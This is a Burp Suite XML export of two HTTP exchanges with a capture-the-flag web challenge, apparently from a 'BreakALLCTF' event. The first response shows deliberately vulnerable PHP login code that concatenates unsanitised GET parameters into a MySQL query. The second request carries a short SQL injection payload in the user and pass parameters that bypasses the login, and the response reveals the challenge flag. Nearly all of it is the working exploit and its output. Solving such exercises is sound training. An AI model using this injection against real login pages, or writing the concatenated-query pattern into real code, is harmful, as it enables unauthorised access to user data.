<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Thu Dec 13 16:23:56 CST 2018">
  <item>
    <time>Thu Dec 13 16:23:30 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4003/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4003</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:4003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>3968</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:23:30 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 3774
Connection: close
Content-Type: text/html; charset=UTF-8

<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #DD0000">"config.php"</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$conn&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_connect</span><span style="color: #007700">(</span><span style="color: #0000BB">$host</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$dbuser</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$dbpass</span><span style="color: #007700">)&nbsp;or&nbsp;die(</span><span style="color: #DD0000">'connection&nbsp;failed'</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">mysql_query</span><span style="color: #007700">(</span><span style="color: #DD0000">"SET&nbsp;NAMES&nbsp;utf-8"</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">mysql_select_db</span><span style="color: #007700">(</span><span style="color: #DD0000">"news"</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">];<br /><br />if(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;&gt;&nbsp;</span><span style="color: #0000BB">4</span><span style="color: #007700">)&nbsp;die(</span><span style="color: #DD0000">'toooooo&nbsp;long!'</span><span style="color: #007700">);<br />if(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$pass</span><span style="color: #007700">)&nbsp;&gt;&nbsp;</span><span style="color: #0000BB">4</span><span style="color: #007700">)&nbsp;die(</span><span style="color: #DD0000">'toooooo&nbsp;long!'</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_query</span><span style="color: #007700">(</span><span style="color: #DD0000">"SELECT&nbsp;*&nbsp;FROM&nbsp;user&nbsp;WHERE&nbsp;username='"&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">"'&nbsp;and&nbsp;password='"&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$pass&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">"'"</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_fetch_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$res</span><span style="color: #007700">);<br /><br />if(</span><span style="color: #0000BB">$res</span><span style="color: #007700">)&nbsp;echo&nbsp;</span><span style="color: #0000BB">$flag</span><span style="color: #007700">;<br />else&nbsp;echo&nbsp;</span><span style="color: #DD0000">"QAQQQQQQ"</span><span style="color: #007700">;<br /></span>
</span>
</code>QAQQQQQQ]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 16:23:33 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4003/?user=%27or&pass=!=1%23]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4003</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?user=%27or&pass=!=1%23]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?user=%27or&pass=!=1%23 HTTP/1.1
Host: 140.110.112.32:4003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>3993</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Thu, 13 Dec 2018 08:23:33 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 3799
Connection: close
Content-Type: text/html; charset=UTF-8

<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #DD0000">"config.php"</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$conn&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_connect</span><span style="color: #007700">(</span><span style="color: #0000BB">$host</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$dbuser</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$dbpass</span><span style="color: #007700">)&nbsp;or&nbsp;die(</span><span style="color: #DD0000">'connection&nbsp;failed'</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">mysql_query</span><span style="color: #007700">(</span><span style="color: #DD0000">"SET&nbsp;NAMES&nbsp;utf-8"</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">mysql_select_db</span><span style="color: #007700">(</span><span style="color: #DD0000">"news"</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'user'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">$pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'pass'</span><span style="color: #007700">];<br /><br />if(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;&gt;&nbsp;</span><span style="color: #0000BB">4</span><span style="color: #007700">)&nbsp;die(</span><span style="color: #DD0000">'toooooo&nbsp;long!'</span><span style="color: #007700">);<br />if(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$pass</span><span style="color: #007700">)&nbsp;&gt;&nbsp;</span><span style="color: #0000BB">4</span><span style="color: #007700">)&nbsp;die(</span><span style="color: #DD0000">'toooooo&nbsp;long!'</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_query</span><span style="color: #007700">(</span><span style="color: #DD0000">"SELECT&nbsp;*&nbsp;FROM&nbsp;user&nbsp;WHERE&nbsp;username='"&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">"'&nbsp;and&nbsp;password='"&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$pass&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">"'"</span><span style="color: #007700">);<br /><br /></span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">mysql_fetch_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$res</span><span style="color: #007700">);<br /><br />if(</span><span style="color: #0000BB">$res</span><span style="color: #007700">)&nbsp;echo&nbsp;</span><span style="color: #0000BB">$flag</span><span style="color: #007700">;<br />else&nbsp;echo&nbsp;</span><span style="color: #DD0000">"QAQQQQQQ"</span><span style="color: #007700">;<br /></span>
</span>
</code>BreakALLCTF{Wd05lgz1WsATQiL88gLX}]]></response>
    <comment></comment>
  </item>
</items>
